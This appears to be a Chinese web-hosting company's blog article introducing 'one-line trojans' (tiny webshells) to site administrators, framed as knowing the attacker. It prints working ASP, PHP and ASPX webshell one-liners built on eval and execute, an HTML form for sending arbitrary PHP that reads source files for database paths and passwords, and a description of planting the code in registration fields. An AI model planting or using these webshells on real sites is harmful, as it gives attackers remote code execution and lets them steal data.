导读:建站文章建站文章作为网站管理员或站长，不得不应对各种黑客入侵行为，万维景盛工程师今天向大家介绍认识一种常见的黑客木马文件——一句话木马。古人云：“知己知彼，百战不殆”。只有了解网站怎么搭建快速建站技术。

作为网站管理员或站长，不得不应对各种黑客入侵行为，万维景盛工程师今天向大家介绍认识一种常见的黑客木马文件——一句话木马。古人云：“知己知彼，百战不殆”。只有了解黑客的入侵工具和行为特征，才能更好地做好网站防护。一句话木马是一种基于B/S结构的简短脚本，通过这个脚本，执行POST来的任意参数语句，可以提交任意内容，黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息，达到注入非法信息等的目的。

这个程序把提交的数据当PHP语句执行，利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成，例如：

<form method=post action=http://....../你的名字.php>  

<textarea name=cmd>  

//这里面写PHP程序，随便连接数据和修改文件都可以，当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码  

$str=file_get_content('xxx.php');  

$str=str_replace('<','&lt;',$str);  

echo "<pre>$str</pre>"  

</textarea>  

<input type=submit>  

</form>  

黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码：

<%execute request("value")%>  

其中value是值，所以你可以更改自己的值，前面的request就是获取这个值

<%eval request("value")%>  

(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)

当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道这个文件被插入到哪一个ASP文件里面就可以了。）

常用一句话木马

asp一句话木马：

　　

<%execute(request("value"))%>  

　　php一句话木马：

　　

<?php @eval($_POST[value]);?>  

　　aspx一句话木马：

<%@ Page Language="Jscript"%>  

  

<%eval(Request.Item["value"])%>  

关键词标签: 建站 句话 木马